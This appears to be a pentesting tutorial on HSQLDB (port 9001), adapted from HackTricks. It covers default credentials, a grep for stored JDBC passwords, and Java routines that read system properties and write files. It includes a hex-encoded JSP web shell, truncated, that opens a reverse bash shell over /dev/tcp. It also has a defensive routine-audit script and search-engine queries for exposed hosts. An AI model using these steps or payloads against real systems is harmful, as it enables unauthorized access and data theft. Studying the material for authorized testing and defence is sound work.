---
title: "9001 - Hsqldb"
weight: 9001
date: "2026-03-10T10:03:28+08:00"
lastmod: "2026-03-10T13:26:55+08:00"
---

💡 **Study note**: This document covers penetration-testing methods for **9001 - HSQLDB** and is intended as a reference for information-security beginners and practitioners.

⚠️ **Legal notice**: This document is for learning and authorized testing only. Testing systems without authorization may violate laws and regulations.

---

## 9001 - Pentesting HSQLDB

### Basic Information

**HSQLDB ([HyperSQL DataBase](http://hsqldb.org/))** is the leading SQL relational database system written in Java. It offers a small, fast multithreaded and transactional database engine with in-memory and disk-based tables and supports embedded and server modes.

**Default port:** 9001

```text
9001/tcp open  jdbc      HSQLDB JDBC (Network Compatibility Version 2.3.4.0)
```

### Default Settings

Note that by default this service is likely running in memory or is bound to localhost. If you found it, you probably exploited another service and are looking to escalate privileges.

Default credentials are usually `sa` with a blank password.

If you’ve exploited another service, search for possible credentials using

```text
grep -rP 'jdbc:hsqldb.*password.*' /path/to/search
```

Note the database name carefully - you’ll need it to connect.

### Info Gathering

Connect to the DB instance by [downloading HSQLDB](https://sourceforge.net/projects/hsqldb/files/) and extracting `hsqldb/lib/hsqldb.jar`. Run the GUI app (eww) using `java -jar hsqldb.jar` and connect to the instance using the discovered/weak credentials.

Note that the connection URL for a remote system will look something like this: `jdbc:hsqldb:hsql://ip/DBNAME`.

### Tricks

#### Java Language Routines

We can call static methods of a Java class from HSQLDB using Java Language Routines. Do note that the called class needs to be in the application’s classpath.

JRTs can be `functions` or `procedures`. Functions can be called via SQL statements if the Java method returns one or more SQL-compatible primitive variables. They are invoked using the `VALUES` statement.

If the Java method we want to call returns void, we need to use a procedure invoked with the `CALL` statement.

#### Reading Java System Properties

Create function:

```text
CREATE FUNCTION getsystemproperty(IN key VARCHAR) RETURNS VARCHAR LANGUAGE JAVA
DETERMINISTIC NO SQL
EXTERNAL NAME 'CLASSPATH:java.lang.System.getProperty'
```

Execute function:

```text
VALUES(getsystemproperty('user.name'))
```

You can find a [list of system properties here](https://docs.oracle.com/javase/tutorial/essential/environment/sysprop.html).

#### Write Content to File

You can use the `com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename` Java gadget located in the JDK (auto loaded into the class path of the application) to write hex-encoded bytes to disk via a custom procedure. **Note the maximum size of 1024 bytes**.

Create procedure:

```text
CREATE PROCEDURE writetofile(IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(1024))
LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME
'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'
```

Execute procedure:

```text
call writetofile('/path/ROOT/shell.jsp', cast ('3c2540207061676520696d706f72743d226a6176612e696f2e2a2220253e0a3c250a202020537472696e6720636d64203d20222f62696e2f62617368202d69203e26202f6465762f7463702f3139322e3136382e3131392[...]' AS VARBINARY(1024)))
```
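A defender-side audit of the Java Language Routines described in this section, added here and not part of the original page or of HSQLDB itself: it parses DDL in the shape of an HSQLDB `.script` file (one statement per line, or hand-written multi-line statements like the ones above), extracts each routine's `EXTERNAL NAME 'CLASSPATH:...'` target, and classifies it against an allowlist. The allowlist, the high-risk prefix list and the sample DDL are constructed assumptions.

```python
import re

# Statement head: CREATE FUNCTION|PROCEDURE <name>
HEAD_RE = re.compile(r"\bCREATE\s+(?P<kind>FUNCTION|PROCEDURE)\s+(?P<name>\"[^\"]+\"|[\w.]+)", re.I)
# Java routine body: LANGUAGE JAVA ... EXTERNAL NAME 'CLASSPATH:<class>.<method>'
TARGET_RE = re.compile(r"LANGUAGE\s+JAVA.*?EXTERNAL\s+NAME\s+'CLASSPATH:(?P<target>[\w.$]+)'", re.I | re.S)

# Constructed allowlist: Java packages the application deliberately exposes as JRTs.
ALLOWED_PREFIXES = ("org.example.app.sqlfuncs.",)
# Java entry points that hand a SQL user system-property, file or process access.
HIGH_RISK_PREFIXES = (
    "java.lang.System.", "java.lang.Runtime.", "java.lang.ProcessBuilder.", "java.io.", "java.nio.file.",
    "com.sun.org.apache.xml.internal.security.utils.JavaUtils.")

def split_statements(ddl):
    """Split DDL text at each CREATE keyword, so one routine never bleeds into the next."""
    starts = [m.start() for m in re.finditer(r"\bCREATE\b", ddl, re.I)]
    return [ddl[a:b] for a, b in zip(starts, starts[1:] + [len(ddl)])]

def classify(target):
    if target.startswith(ALLOWED_PREFIXES):
        return "allowed"
    if target.startswith(HIGH_RISK_PREFIXES):
        return "high-risk"
    return "review"

def audit_jrts(ddl):
    """Return (kind, name, java_target, verdict) for every Java Language Routine in ddl."""
    findings = []
    for stmt in split_statements(ddl):
        head, body = HEAD_RE.match(stmt), TARGET_RE.search(stmt)
        if head and body:  # SQL-bodied routines and tables carry no CLASSPATH target
            target = body.group("target")
            findings.append((head.group("kind").upper(), head.group("name"), target, classify(target)))
    return findings

# Constructed sample DDL in the shape of a .script file, plus the two routines from this page.
SAMPLE_DDL = """
CREATE TABLE PUBLIC.USERS(ID INTEGER PRIMARY KEY, NAME VARCHAR(64))
CREATE FUNCTION PUBLIC.APP_SHA256(IN DATA VARCHAR(4096)) RETURNS VARCHAR(64) LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME 'CLASSPATH:org.example.app.sqlfuncs.Hashing.sha256Hex'
CREATE FUNCTION PUBLIC.DOUBLE_IT(IN X INTEGER) RETURNS INTEGER RETURN X * 2
CREATE FUNCTION getsystemproperty(IN key VARCHAR) RETURNS VARCHAR LANGUAGE JAVA
DETERMINISTIC NO SQL EXTERNAL NAME 'CLASSPATH:java.lang.System.getProperty'
CREATE PROCEDURE writetofile(IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(1024)) LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME 'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'
CREATE PROCEDURE PUBLIC.NOTIFY(IN MSG VARCHAR(256)) LANGUAGE JAVA NO SQL EXTERNAL NAME 'CLASSPATH:org.acme.Hooks.notify'
"""

if __name__ == "__main__":
    for kind, name, target, verdict in audit_jrts(SAMPLE_DDL):
        print(f"{verdict:9} {kind:9} {name:28} -> {target}")
```

Running the same audit against `INFORMATION_SCHEMA.ROUTINES` output, or periodically against the `.script` file, turns the routines shown above into a detectable persistence artifact rather than a silent one.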

---

### Search Engine Syntax

#### FOFA

```bash
# FOFA search syntax
port="9001"
```

#### Shodan

```bash
# Shodan search syntax
port:9001
```

#### ZoomEye

```bash
# ZoomEye search syntax
port:9001
```

---

## 📖 References

- [HackTricks - 9001-hsqldb](https://book.hacktricks.wiki/en/network-services-pentesting/9001-hsqldb.html)

